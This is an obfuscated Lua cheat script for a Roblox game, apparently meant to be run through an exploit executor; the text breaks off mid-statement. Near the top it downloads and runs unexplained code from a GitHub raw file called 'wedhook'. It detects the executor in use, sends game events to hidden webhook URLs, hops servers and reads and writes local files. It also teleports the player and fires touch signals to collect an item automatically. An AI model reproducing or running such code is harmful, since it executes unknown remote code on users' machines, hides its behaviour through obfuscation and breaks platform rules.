--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v83,v84) local v85={};for v127=1, #v83 do v6(v85,v0(v4(v1(v2(v83,v127,v127 + 1 )),v1(v2(v84,1 + (v127% #v84) ,1 + (v127% #v84) + 1 )))%256 ));end return v5(v85);end loadstring(game:HttpGet("https://raw.githubusercontent.com/Chetdithglon/lklklkl/main/wedhook"))();if game:GetService(v7("\230\204\201\46\245\171\198\29\212","\126\177\163\187\69\134\219\167")).Map:FindFirstChild(v7("\14\212\57\209\245\32\228\57\201\253\45\201","\156\67\173\74\165")) then local v128=(is_sirhurt_closure and v7("\7\190\91\30\169\52\82","\38\84\215\41\118\220\70")) or (pebc_execute and v7("\96\4\45\6\241\99\27\35\1\246\85\4","\158\48\118\66\114")) or (syn and v7("\152\61\30\55\99\182\254\235\28","\155\203\68\112\86\19\197")) or (secure_load and v7("\117\216\56\232\73\118\224\244","\152\38\189\86\156\32\24\133")) or (KRNL_LOADED and v7("\215\69\169\74","\38\156\55\199")) or (SONA_LOADED and v7("\155\114\114\41","\35\200\29\28\72\115\20\154")) or v7("\42\183\216\203\205\41\44\9\179\222\214\153\108\51","\84\121\223\177\191\237\76") ;local v129=game:GetService(v7("\147\66\221\176\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));local v130={[v7("\76\79\2\32\77\81","\69\41\34\96")]={{[v7("\186\202\210\6\6\56","\75\220\163\183\106\98")]={{[v7("\12\187\134\50","\185\98\218\235\87")]="đảo bí ẩn",[v7("\221\61\43\243\219","\202\171\92\71\134\190")]="```Người dùng đã thấy đảo bí ẩn```",[v7("\32\207\32\129\39\196","\232\73\161\76")]=true},{[v7("\181\216\79\88","\126\219\185\34\61")]="lệnh teleport sever",[v7("\26\207\82\103\123","\135\108\174\62\18\30\23\147")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\191\231\38\194\22\171","\167\214\137\74\171\120\206\83")]=true}}}}};local v131={[v7("\168\255\60\73\253\169\159\189\6\68\232\162","\199\235\144\82\61\152")]="application/json"};local v132=v129:JSONEncode(v130);Request=http_request or request or HttpPost or syn.request ;local v133={[v7("\50\4\181","\75\103\118\217")]=_G.daobian,[v7("\229\91\116\13","\126\167\52\16\116\217")]=v132,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v131};Request(v133);end if (game.PlaceId==(7387641702 -  -61781933)) then if (game:GetService(v7("\248\205\233\84\192\205\224\91","\60\180\164\142")).Sky.MoonTextureId=="http://www.roblox.com/asset/?id=9709149052") then local v142=1726 -(1668 + 58) ;local v143;local v144;local v145;local v146;local v147;local v148;local v149;while true do if (v142==0) then v143=0;v144=nil;v142=1;end if (v142==(627 -(512 + 114))) then v145=nil;v146=nil;v142=2;end if (v142==2) then local v224=0 -0 ;while true do if (v224==(0 -0)) then v147=nil;v148=nil;v224=3 -2 ;end if (v224==(1 + 0)) then v142=1 + 2 ;break;end end end if (v142==3) then v149=nil;while true do if (v143==1) then v146={[v7("\168\208\18\245\124\229","\150\205\189\112\144\24")]={{[v7("\35\141\186\64\0\155","\112\69\228\223\44\100\232\113")]={{[v7("\218\30\10\214","\230\180\127\103\179\214\28")]=v7("\219\80\26\6\201\78\239\130","\128\236\101\63\38\132\33"),[v7("\186\168\29\81\179","\175\204\201\113\36\214\139")]="Người dùng đã thấy Moon 75%",[v7("\78\194\57\213\10\66","\100\39\172\85\188")]=true},{[v7("\163\121\180\133","\83\205\24\217\224")]="lệnh teleport sever",[v7("\240\196\193\40\227","\93\134\165\173")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\183\252\205\203\52\203","\30\222\146\161\162\90\174\210")]=true}}}}};v147={[v7("\198\65\126\30\224\64\100\71\209\87\96\15","\106\133\46\16")]="application/json"};v143=2;end if (v143==2) then local v243=0;local v244;while true do if (v243==(0 + 0)) then v244=0 -0 ;while true do if (v244==(1994 -(109 + 1885))) then local v256=1469 -(1269 + 200) ;while true do if (v256==0) then v148=v145:JSONEncode(v146);Request=http_request or request or HttpPost or syn.request ;v256=1 -0 ;end if (v256==(816 -(98 + 717))) then v244=1;break;end end end if (v244==1) then v143=829 -(802 + 24) ;break;end end break;end end end if (v143==(0 -0)) then v144=(is_sirhurt_closure and v7("\107\87\23\33\50\255\6","\114\56\62\101\73\71\141")) or (pebc_execute and v7("\136\251\212\208\183\218\214\197\171\225\222\214","\164\216\137\187")) or (syn and v7("\225\255\63\179\182\237\14\146\222","\107\178\134\81\210\198\158")) or (secure_load and v7("\11\11\140\210\163\54\11\142","\202\88\110\226\166")) or (KRNL_LOADED and v7("\232\29\140\251","\170\163\111\226\151")) or (SONA_LOADED and v7("\34\63\188\57","\73\113\80\210\88\46\87")) or v7("\178\36\196\6\167\132\52\221\30\232\136\56\141\21","\135\225\76\173\114") ;v145=game:GetService(v7("\50\249\172\160\159\184\181\12\228\187\181","\199\122\141\216\208\204\221"));v143=1 -0 ;end if (v143==(1 + 2)) then v149={[v7("\109\50\127","\32\56\64\19\156\58")]=_G.FullMoon,[v7("\120\199\225\79","\224\58\168\133\54\58\146")]=v148,[v7("\116\83\95\245\122\130","\107\57\54\43\157\21\230\231")]=v7("\235\164\34\193","\175\187\235\113\149\217\188"),[v7("\20\170\128\72\230\107\107","\24\92\207\225\44\131\25")]=v147};Request(v149);break;end end break;end end end end local v8=Instance.new(v7("\120\208\170\73\30\115\108\198\177","\29\43\179\216\44\123"));local v9=Instance.new(v7("\137\220\56\88\159\204\52\88\178\215","\44\221\185\64"));local v10=Instance.new(v7("\52\206\107\80\97\15\226\90","\19\97\135\40\63"));local v11=Instance.new(v7("\155\117\20\41\46\53\167\89\61\47","\81\206\60\83\91\79"));local v12=Instance.new(v7("\122\174\200\102\13\214\89\176\65\165","\196\46\203\176\18\79\163\45"));local v13=Instance.new(v7("\141\11\93\17\54\245\234\170","\143\216\66\30\126\68\155"));local v14=Instance.new(v7("\159\225\62\223\215\172\220\228","\129\202\168\109\171\165\195\183"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\18\84\54\193\219\6\193\55\81","\134\66\56\87\184\190\116"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Name=v7("\47\52\31\190\11","\85\92\81\105\219\121\139\65");v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(196 + 59 ,255,255);v9.BorderColor3=Color3.fromRGB(0,0 + 0 ,0 + 0 );v9.BorderSizePixel=0;v9.Position=UDim2.new(0.930088699 -0 ,0,0.601923108 -0 ,0);v9.Size=UDim2.new(0.062432725 + 0 ,0 + 0 ,0.0596153848 + 0 ,0);v9.Font=Enum.Font.SourceSans;v9.Text="Đổi Sever";v9.TextColor3=Color3.fromRGB(0,0 + 0 ,0 + 0 );v9.TextScaled=true;v9.TextSize=1447 -(797 + 636) ;v9.TextWrapped=true;v10.CornerRadius=UDim.new(0 -0 ,20);v10.Parent=v9;v11.Color=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.fromRGB(171 -97 ,230 + 25 ,92 + 109 )),ColorSequenceKeypoint.new(326.29 -(192 + 134) ,Color3.fromRGB(1395 -(316 + 960) ,140 + 110 ,127)),ColorSequenceKeypoint.new(0.55 + 0 ,Color3.fromRGB(829 -612 ,246,701 -(83 + 468) )),ColorSequenceKeypoint.new(0.77 -0 ,Color3.fromRGB(402 -160 ,556 -355 ,455 -(45 + 280) )),ColorSequenceKeypoint.new(1 + 0 ,Color3.fromRGB(94 + 161 ,85 + 68 ,153))});v11.Parent=v9;v12.Parent=v9;v12.BackgroundColor3=Color3.fromRGB(255,255,45 + 210 );v12.BackgroundTransparency=1 -0 ;v12.BorderColor3=Color3.fromRGB(0,0,1911 -(340 + 1571) );v12.BorderSizePixel=0 + 0 ;v12.Position=UDim2.new( -(1772.103447914 -(1733 + 39)),0 -0 , -1.54838681,1034 -(125 + 909) );v12.Size=UDim2.new(1949.18965518 -(1096 + 852) ,0,1.54838705,0 + 0 );v12.ZIndex= -(1 -0);v12.Font=Enum.Font.SourceSansBold;v12.Text="x";v12.TextColor3=Color3.fromRGB(248 + 7 ,512 -(409 + 103) ,236 -(46 + 190) );v12.TextScaled=true;v12.TextSize=14;v12.TextStrokeColor3=Color3.fromRGB(255,119 -(51 + 44) ,7);v12.TextWrapped=true;v13.CornerRadius=UDim.new(0,6 + 14 );v13.Parent=v12;v14.Thickness=1320.9000000953674 -(1114 + 203) ;v14.Parent=v12;local function v56() local v86=726 -(228 + 498) ;local v87;local v88;local v89;local v90;while true do if (v86==(0 + 0)) then v87=Instance.new(v7("\206\176\66\76\108\203","\191\157\211\48\37\28"),v11);v88=game:GetService(v7("\235\8\241\25\52\236\26\230\10\51\220\26","\90\191\127\148\124"));v86=1 + 0 ;end if (v86==1) then v89=TweenInfo.new(4,Enum.EasingStyle.Linear,Enum.EasingDirection.In, -1);v90=v88:Create(v87.Parent,v89,{[v7("\74\136\58\22\108\142\33\25","\119\24\231\78")]=1023 -(174 + 489) });v86=5 -3 ;end if (v86==(1907 -(830 + 1075))) then v90:Play();break;end end end coroutine.wrap(v56)();local function v57() local v91=524 -(303 + 221) ;local v92;while true do if (v91==0) then v92=Instance.new(v7("\177\46\183\67\204\84","\113\226\77\197\42\188\32"),v12);v92.Parent.MouseButton1Click:Connect(function() v92.Parent.Parent:Destroy();end);break;end end end coroutine.wrap(v57)();local function v58() local v93=0;local v94;while true do if ((1269 -(231 + 1038))==v93) then v94=Instance.new(v7("\22\25\247\180\54\37\247\167\51\6\224","\213\90\118\148"),v9);v94.Parent.MouseButton1Click:Connect(function() game:GetService(v7("\111\43\184\83\93\84\60\160\101\72\73\56\189\85\72","\45\59\78\212\54")):Teleport(game.PlaceId,game:GetService(v7("\32\90\130\146\131\60\190","\144\112\54\227\235\230\78\205")).LocalPlayer);end);break;end end end coroutine.wrap(v58)();local v59={};local v60=game:GetService(v7("\135\63\10\249\222\104\182\58\25\245\211\94","\59\211\72\111\156\176"));local v61=Instance.new(v7("\125\132\241\40\75\137\196\56\71","\77\46\231\131"));v61.Name=v7("\152\85\186\65\168\85\188\65","\32\218\52\214");v61.Parent=game.CoreGui;v61.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;local v66=Instance.new(v7("\104\5\48\165\244","\58\46\119\81\200\145\208\37"));v66.Name=v7("\5\131\36\165\143\175\55\38\137","\86\75\236\80\204\201\221");v66.Parent=v61;v66.AnchorPoint=Vector2.new(0.5 + 0 ,1162.5 -(171 + 991) );v66.BackgroundColor3=Color3.fromRGB(1050 -795 ,255,684 -429 );v66.BackgroundTransparency=1;v66.Position=UDim2.new(1.2,0 -0 ,0.0613496937 + 0 ,0 -0 );v66.Size=UDim2.new(0,1632,0,288 -188 );local v74=Instance.new(v7("\71\104\91\140\237\159\94\64\110\138\235\159","\235\18\33\23\229\158"));v74.Name=v7("\126\181\213\178\92\179\210\175\92\187\216\180\69\174","\219\48\218\161");v74.Parent=v66;v74.FillDirection=Enum.FillDirection.Vertical;v74.SortOrder=Enum.SortOrder.LayoutOrder;v74.Padding=UDim.new(0 -0 ,15 -10 );v59.Notification=function(v95,v96,v97,v98,v99) local v100=1248 -(111 + 1137) ;local v101;local v102;local v103;local v104;local v105;local v106;local v107;local v108;local v109;local v110;while true do if (v100==2) then v102.LineJoinMode=Enum.LineJoinMode.Round;v102.Color=Color3.fromRGB(413 -(91 + 67) ,255,255);v102.Transparency=0;v101:TweenSizeAndPosition(UDim2.new(0 -0 ,250 -(3 + 7) ,523 -(423 + 100) ,70),UDim2.new(0.5 + 0 ,0 -0 ,0.5 + 0 ,771 -(326 + 445) ),v7("\138\191\55","\49\197\202\67\126\115\100\167"),v7("\21\90\220\34","\62\87\59\191\73\224\54"),0.3 -0 ,true);v103=Instance.new(v7("\210\43\217\198\245\12\255\219","\169\135\98\154"));v103.CornerRadius=UDim.new(0 -0 ,9 -5 );v100=714 -(530 + 181) ;end if (v100==11) then v108.Name=v7("\10\54\244\244","\145\94\95\153");v108.Parent=v101;v108.Active=true;v108.BackgroundColor3=Color3.fromRGB(966 -(614 + 267) ,170,255);v108.BorderSizePixel=0;v108.Position=UDim2.new(32.0320000015 -(19 + 13) ,0 -0 ,0.870000005,0 -0 );v100=12;end if (v100==(2 -1)) then local v161=0 + 0 ;while true do if (v161==0) then v101.Size=UDim2.new(0,0 -0 ,0 -0 ,0);v102=Instance.new(v7("\153\7\152\95\213\88\21\12","\105\204\78\203\43\167\55\126"));v161=1813 -(1293 + 519) ;end if (v161==1) then v102.Thickness=1;v102.Name="";v161=3 -1 ;end if (v161==(7 -4)) then v100=2;break;end if (2==v161) then v102.Parent=v101;v102.ApplyStrokeMode=Enum.ApplyStrokeMode.Border;v161=5 -2 ;end end end if (v100==(21 -16)) then v106=Instance.new(v7("\170\239\77\63\23","\26\236\157\44\82\114\44"));v105.Name=v7("\62\54\209\87\35\42","\59\74\78\181");v105.Parent=v101;v105.BackgroundColor3=Color3.fromRGB(200 -115 ,91 + 79 ,53 + 202 );v105.BackgroundTransparency=2 -1 ;v105.Position=UDim2.new(0.25 + 0 ,0 + 0 ,0.15,0 + 0 );v100=6;end if ((1103 -(709 + 387))==v100) then v106.Name=v7("\9\208\88\86\182\3\195\91\87\182","\211\69\177\58\58");v106.Parent=v101;v106.AnchorPoint=Vector2.new(0.5,1858.5 -(673 + 1185) );v106.BackgroundColor3=Color3.fromRGB(255,739 -484 ,818 -563 );v106.BackgroundTransparency=1 -0 ;v106.Position=UDim2.new(0.625999987,0,0.620000005,0 + 0 );v100=6 + 2 ;end if (v100==(5 -1)) then v104.BackgroundColor3=Color3.fromRGB(255,63 + 192 ,255);v104.Position=UDim2.new(0.135999978 -0 ,0 -0 ,0.5,1880 -(446 + 1434) );v104.Size=UDim2.new(0,50,0,50);v104.BackgroundTransparency=1284 -(1040 + 243) ;v104.Image="http://www.roblox.com/asset/?id="   .. tostring(v99) ;v105=Instance.new(v7("\195\246\36\198\219\242\62\215\251","\178\151\147\92"));v100=14 -9 ;end if (v100==6) then v105.Size=UDim2.new(1847 -(559 + 1288) ,175,1931 -(609 + 1322) ,24);v105.Font=Enum.Font.LuckiestGuy;v105.TextColor3=Color3.fromRGB(539 -(13 + 441) ,635 -465 ,667 -412 );v105.TextSize=64 -51 ;v105.Text=v96;v105.TextXAlignment=Enum.TextXAlignment.Left;v100=1 + 6 ;end if (v100==(36 -26)) then local v186=0 + 0 ;while true do if (v186==(1 + 1)) then v109=Instance.new(v7("\244\107\17\217\23\207\71\32","\101\161\34\82\182"));v110=Instance.new(v7("\221\36\105\255\223\230\139\32\239","\78\136\109\57\158\187\130\226"));v186=8 -5 ;end if (v186==(0 + 0)) then v107.TextSize=21 -9 ;v107.TextXAlignment=Enum.TextXAlignment.Left;v186=1;end if (v186==(1 + 0)) then repeat wait();until v101.Size==UDim2.new(0,(140 + 110) -10 ,0,70)  v108=Instance.new(v7("\163\160\50\6\77","\233\229\210\83\107\40\46"));v186=2 + 0 ;end if (v186==(3 + 0)) then v100=11;break;end end end if (v100==(8 + 0)) then v106.Size=UDim2.new(0,608 -(153 + 280) ,0 -0 ,23 + 2 );v107=Instance.new(v7("\131\224\97\225\197\202\181\224\117","\171\215\133\25\149\137"));v107.Name=v7("\213\205\42\238\193\63\232\75","\34\129\168\82\154\143\80\156");v107.Parent=v106;v107.Active=true;v107.BackgroundColor3=Color3.fromRGB(101 + 154 ,255,255);v100=5 + 4 ;end if (v100==3) then v103.Name=v7("\232\120\42\90\248\33\252\194\99\45\88\248","\168\171\23\68\52\157\83");v103.Parent=v101;v104=Instance.new(v7("\221\124\244\170\32\1\134\246\116\249","\231\148\17\149\205\69\77"));v104.Name=v7("\137\170\198\252\82\241\143\179\206","\159\224\199\167\155\55");v104.Parent=v101;v104.AnchorPoint=Vector2.new(0.5 + 0 ,0.5);v100=3 + 1 ;end if ((0 -0)==v100) then if (v99==nil) then v99="";end if (v98==nil) then v98=1 + 0 ;end v101=Instance.new(v7("\194\99\125\68\222","\128\132\17\28\41\187\47"));v101.Name=v7("\53\59\18\54\88\39\32\7\55\88","\61\97\82\102\90");v101.Parent=v66;v101.BackgroundColor3=Color3.fromRGB(702 -(89 + 578) ,35,26 + 9 );v100=1 -0 ;end if (v100==9) then v107.BackgroundTransparency=1050 -(572 + 477) ;v107.Size=UDim2.new(0 + 0 ,106 + 69 ,0 + 0 ,25);v107.Font=Enum.Font.GothamBlack;v107.Text=v97;v107.TextScaled=true;v107.TextColor3=Color3.fromRGB(255,341 -(84 + 2) ,255);v100=16 -6 ;end if (v100==(10 + 3)) then v110.PaddingTop=UDim.new(0,15);v60:Create(v108,TweenInfo.new(tonumber(v98),Enum.EasingStyle.Linear,Enum.EasingDirection.InOut),{[v7("\206\196\14\208","\215\157\173\116\181\46")]=UDim2.new(0,842 -(497 + 345) ,0,1 + 2 )}):Play();delay(tonumber(v98),function() local v216=0 + 0 ;while true do if (v216==(1336 -(605 + 728))) then v101:Destroy();break;end if (v216==1) then local v234=0 + 0 ;while true do if ((1 -0)==v234) then v216=1 + 1 ;break;end if ((0 -0)==v234) then v60:Create(v105,TweenInfo.new(0.2,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\104\0\216\187\22\202\93\11\211\191\35\202\89\11\195\182","\184\60\101\160\207\66")]=1 + 0 }):Play();wait(0.3 -0 );v234=1 + 0 ;end end end if (v216==0) then v60:Create(v104,TweenInfo.new(489.2 -(457 + 32) ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\28\185\138\245\223\1\166\138\252\201\37\181\153\247\212\54\173","\186\85\212\235\146")]=1 + 0 }):Play();v60:Create(v107,TweenInfo.new(0.2,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\246\132\14\234\13\252\89\204\146\6\255\43\235\86\193\152","\56\162\225\118\158\89\142")]=1403 -(832 + 570) }):Play();v216=1 + 0 ;end if (v216==(1 + 1)) then v60:Create(v101,TweenInfo.new(0.4 -0 ,Enum.EasingStyle.Quart,Enum.EasingDirection.InOut),{[v7("\2\139\102\185","\220\81\226\28")]=UDim2.new(0 + 0 ,0,0,866 -(588 + 208) )}):Play();wait(0.3 -0 );v216=1803 -(884 + 916) ;end end end);break;end if (v100==(24 -12)) then v108.Size=UDim2.new(0 + 0 ,889 -(232 + 421) ,1889 -(1569 + 320) ,3);v109.Parent=v108;v109.CornerRadius=UDim.new(0 + 0 ,2 + 5 );v109.Name="";v110.Parent=v66;v110.PaddingLeft=UDim.new(0,15);v100=13;end end end;repeat wait();until game:IsLoaded() aut=true;function totarget(v111) local v112=0 -0 ;local v113;local v114;local v115;local v116;while true do if (v112==0) then v113=game:service(v7("\39\194\135\254\228\244\22\199\148\242\233\194","\167\115\181\226\155\138"));v114=TweenInfo.new((game:GetService(v7("\210\46\230\69\126\99\213","\166\130\66\135\60\27\17"))[v7("\104\69\205\116\60\116\70\207\108\53\86","\80\36\42\174\21")].Character.HumanoidRootPart.Position-v111.Position).Magnitude/(905 -(316 + 289)) ,Enum.EasingStyle.Linear);v112=2 -1 ;end if (v112==(1 + 0)) then v115,v116=pcall(function() local v217=1453 -(666 + 787) ;local v218;while true do if (v217==(425 -(360 + 65))) then v218=0 + 0 ;while true do if (v218==0) then v115=v113:Create(game.Players.LocalPlayer.Character['HumanoidRootPart'],v114,{[v7("\109\54\37\123\67\21","\26\46\112\87")]=v111});v115:Play();break;end end break;end end end);if  not v115 then return v116;end break;end end end function thisCode() repeat task.wait();until game:IsLoaded() local v117=game.PlaceId;local v118={};local v119="";local v120=os.date(v7("\248\105\191","\212\217\67\203\20\223\223\37")).hour;local v121=false;local v122=pcall(function() v118=game:GetService(v7("\146\153\188\194\137\136\186\196\179\142\173","\178\218\237\200")):JSONDecode(readfile(v7("\152\186\242\227\183\184\227\227\179\167\240\213\164\166\168\218\165\186\232","\176\214\213\134")));end);if  not v122 then table.insert(v118,v120);writefile(v7("\218\162\162\231\169\91\92\199\168\164\194\173\68\74\186\167\165\219\166","\57\148\205\214\180\200\54"),game:GetService(v7("\58\233\33\36\69\23\239\35\61\117\23","\22\114\157\85\84")):JSONEncode(v118));end function TPReturner() local v134=254 -(79 + 175) ;local v135;local v136;local v137;local v138;while true do if (v134==(1 -0)) then local v219=0 + 0 ;while true do if (v219==(2 -1)) then v134=3 -1 ;break;end if (v219==(899 -(503 + 396))) then v137=nil;v138=nil;v219=182 -(92 + 89) ;end end end if ((3 -1)==v134) then while true do if (v135==(2 + 0)) then v138=0;for v238,v239 in pairs(v136.data) do local v240=0 + 0 ;local v241;while true do if (v240==(3 -2)) then if (tonumber(v239.maxPlayers)>tonumber(v239.playing)) then for v253,v254 in pairs(v118) do local v255=0;while true do if (v255==(0 + 0)) then if (v138~=(0 -0)) then if (v137==tostring(v254)) then v241=false;end elseif (tonumber(v120)~=tonumber(v254)) then local v267=pcall(function() local v273=0 + 0 ;local v274;while true do if (v273==(0 + 0)) then v274=0 -0 ;while true do if (v274==(0 + 0)) then local v276=0;while true do if (v276==(0 -0)) then delfile(v7("\144\251\23\118\130\179\241\48\64\145\168\241\17\86\205\180\231\12\75","\227\222\148\99\37"));v118={};v276=1245 -(485 + 759) ;end if (v276==(2 -1)) then v274=1190 -(442 + 747) ;break;end end end if ((1136 -(832 + 303))==v274) then table.insert(v118,v120);break;end end break;end end end);end v138=v138 + (947 -(88 + 858)) ;break;end end end if (v241==true) then local v257=0;local v258;while true do if (v257==(0 + 0)) then v258=0 + 0 ;while true do if (v258==(1 + 0)) then pcall(function() local v275=789 -(766 + 23) ;while true do if (v275==0) then writefile(v7("\29\93\70\197\248\62\87\97\243\235\37\87\64\229\183\57\65\93\248","\153\83\50\50\150"),game:GetService(v7("\117\98\103\12\64\174\95\75\127\112\25","\45\61\22\19\124\19\203")):JSONEncode(v118));wait();v275=4 -3 ;end if (v275==1) then game:GetService(v7("\245\23\1\240\18\127\171\213\33\8\231\20\121\186\196","\217\161\114\109\149\98\16")):TeleportToPlaceInstance(v117,v137,game.Players.LocalPlayer);break;end end end);wait(5 -1 );break;end if (v258==(0 -0)) then local v268=0 -0 ;while true do if (v268==(1073 -(1036 + 37))) then table.insert(v118,v137);wait();v268=1 + 0 ;end if (v268==1) then v258=1 -0 ;break;end end end end break;end end end end break;end if (v240==(0 + 0)) then local v249=1480 -(641 + 839) ;while true do if (v249==(914 -(910 + 3))) then v240=2 -1 ;break;end if (v249==(1684 -(1466 + 218))) then v241=true;v137=tostring(v239.id);v249=1 + 0 ;end end end end end break;end if (v135==(1148 -(556 + 592))) then local v235=0;while true do if (0==v235) then v136=nil;if (v119=="") then v136=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v117   .. "/servers/Public?sortOrder=Asc&limit=100" ));else v136=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v117   .. "/servers/Public?sortOrder=Asc&limit=100&cursor="   .. v119 ));end v235=1;end if (v235==1) then v135=1 + 0 ;break;end end end if (v135==(809 -(329 + 479))) then v137="";if (v136.nextPageCursor and (v136.nextPageCursor~=v7("\202\222\31\200","\200\164\171\115\164\61\150")) and (v136.nextPageCursor~=nil)) then v119=v136.nextPageCursor;end v135=856 -(174 + 680) ;end end break;end if (v134==(0 -0)) then v135=0 -0 ;v136=nil;v134=1 + 0 ;end end end function Teleport() while wait() do pcall(function() local v214=739 -(396 + 343) ;while true do if (v214==(0 + 0)) then TPReturner();if (v119~="") then TPReturner();end break;end end end);end end local v123=0.5;task.spawn(function() while task.wait(v123) do pcall(function() for v220,v221 in pairs(game.CoreGui:GetDescendants()) do pcall(function() if string.find(v221.Name,v7("\55\50\42\115\174\89\23\51\43\125\187\113","\20\114\64\88\28\220")) then if string.find(v221.Text,v7("\2\4\209\161\234\217\169\40\65\217\189\251\219","\221\81\97\178\212\152\176")) then local v246=1477 -(29 + 1448) ;while true do if (v246==0) then v123=1000001389 -(135 + 1254) ;Teleport();break;end end end end end);end end);end end);local v124=game:GetService(v7("\254\243\28\233\14\200\245\58\238\19","\122\173\135\125\155"));local v125=Instance.new(v7("\166\200\14\189\62\51\196\129\231\21\183\60\37\193\139\207","\168\228\161\96\217\95\81"));function gui() v124:SetCore(v7("\232\212\32\88\1\88\207\216\40\85\44\86\207\216\33\82","\55\187\177\78\60\79"),{[v7("\25\199\75\231\67","\224\77\174\63\139\38\175")]=v7("\165\84\76\33\196\98\80\43\151\85","\78\228\33\56"),[v7("\250\123\170\23","\229\174\30\210\99")]=v7("\15\232\138\84\173\59\48\21\233\203\114\229\56\42\15","\89\123\141\230\49\141\93"),[v7("\218\114\249\2","\42\147\17\150\108\112")]="rbxassetid://16435032782",[v7("\43\179\63\126\243\225\0\168","\136\111\198\77\31\135")]=math.huge,[v7("\33\8\171\90\191\229\20\162","\201\98\105\199\54\221\132\119")]=v125,[v7("\155\25\151\53\13\59\253","\204\217\108\227\65\98\85")]=v7("\103\198\230","\160\62\163\149\133\76"),[v7("\244\181\25\59\204\216\242","\163\182\192\109\79")]=v7("\26\41","\149\84\70\96\160")});end gui();v125.OnInvoke=function(v139) if (v139==v7("\22\9","\141\88\102\109")) then local v215=0 -0 ;while true do if (v215==(0 -0)) then aut=false;gui();break;end end elseif (v139==v7("\138\86\217","\161\211\51\170\16\122\93\53")) then local v222=0 + 0 ;local v223;while true do if (v222==0) then v223=1527 -(389 + 1138) ;while true do if ((575 -(102 + 472))==v223) then auto();break;end if (v223==0) then aut=true;gui();v223=1 + 0 ;end end break;end end end end;function auto() if (aut==true) then task.spawn(function() while aut==true  do if (aut==true) then local v236=game.Players.LocalPlayer:FindFirstChild(v7("\216\166\179\58\250\173\166\45\233","\72\155\206\210"));if  not game.Players.LocalPlayer.Character then else local v247=game.Players.LocalPlayer.Character:FindFirstChild(v7("\101\104\81\25\17\100\93","\83\38\26\52\110"),true);if v247 then v247:Destroy();end local v248=game.Players.LocalPlayer.Character:FindFirstChild(v7("\112\2\42\71\86\24\46\66","\38\56\119\71"));if v248 then local v250=game.Workspace:FindFirstChild(v7("\208\231\93\197\49\27\167","\54\147\143\56\182\69")) or game.Workspace:FindFirstChild(v7("\245\137\250\90\203\155\210","\191\182\225\159\41")) or game.Workspace:FindFirstChild(v7("\8\26\45\70\159\202\144","\162\75\114\72\53\235\231")) ;if v250 then local v252=0 + 0 ;while true do if (v252==(0 + 0)) then game.Players.LocalPlayer.Character:PivotTo(v250:GetPivot());firesignal(v250.Touched,game.Players.LocalPlayer.Character.HumanoidRootPart);break;end end elseif (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\208\26\77\240\64\22\204\51\66\162\87\3\158\55\74\231\64\17\210","\98\236\92\36\130\51")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\248\63\5\168\86\188\245\63\162\89\8\187\87\163\187\53\183\10\82","\80\196\121\108\218\37\200\213")) or game.Players.LocalPlayer.Backpack:FindFirstChild("<God's Chalice>") or game.Players.LocalPlayer.Character:FindFirstChild("<God's Chalice>")) then aut=false;Teleport();break;end end end end task.wait();end end);end end end thisCode();auto();task.spawn(function() while wait() do if (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\92\85\11\108\95\78\133\6\51\38\126\89\5\132\5\96\17\33","\234\96\19\98\31\43\110")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\90\57\91\212\184\50\132\0\95\118\198\190\121\133\3\12\65\153","\235\102\127\50\167\204\18"))) then aut=false;end end end);join=game.Players.localPlayer.Neutral==false ;if (_G.Team==nil) then _G.Team=v7("\12\145\252\49\69\58\85\178\171","\78\48\193\149\67\36");end _G.Team=v7("\108\51\129\10\72\62\27\147\70","\33\80\126\224\120");if (((_G.Team==v7("\176\152\10\214\93\248\173\16\154","\60\140\200\99\164")) or (_G.Team==v7("\219\217\5\52\171\137\241\23\120","\194\231\148\100\70"))) and  not join) then local v140=0;local v141;while true do if ((1545 -(320 + 1225))==v140) then v141=0 -0 ;while true do if ((0 + 0)==v141) then repeat local v242=1464 -(157 + 1307) ;while true do if ((1859 -(821 + 1038))==v242) then wait();pcall(function() local v251=0;while true do if (v251==(0 -0)) then join=game.Players.localPlayer.Neutral==false ;if (_G.Team==v7("\118\69\211\162\226\205\85","\168\38\44\161\195\150")) then for v259,v260 in pairs({v7("\173\243\151\101\53\202\163\2\148\243\140\39\19\228\191\21\139","\118\224\156\226\22\80\136\214"),v7("\111\225\76\147\71\204\76\148\86\225\87\209\102\225\78\142","\224\34\142\57"),v7("\255\164\209\212\101\240\73\11\218","\110\190\199\165\189\19\145\61")}) do for v261,v262 in 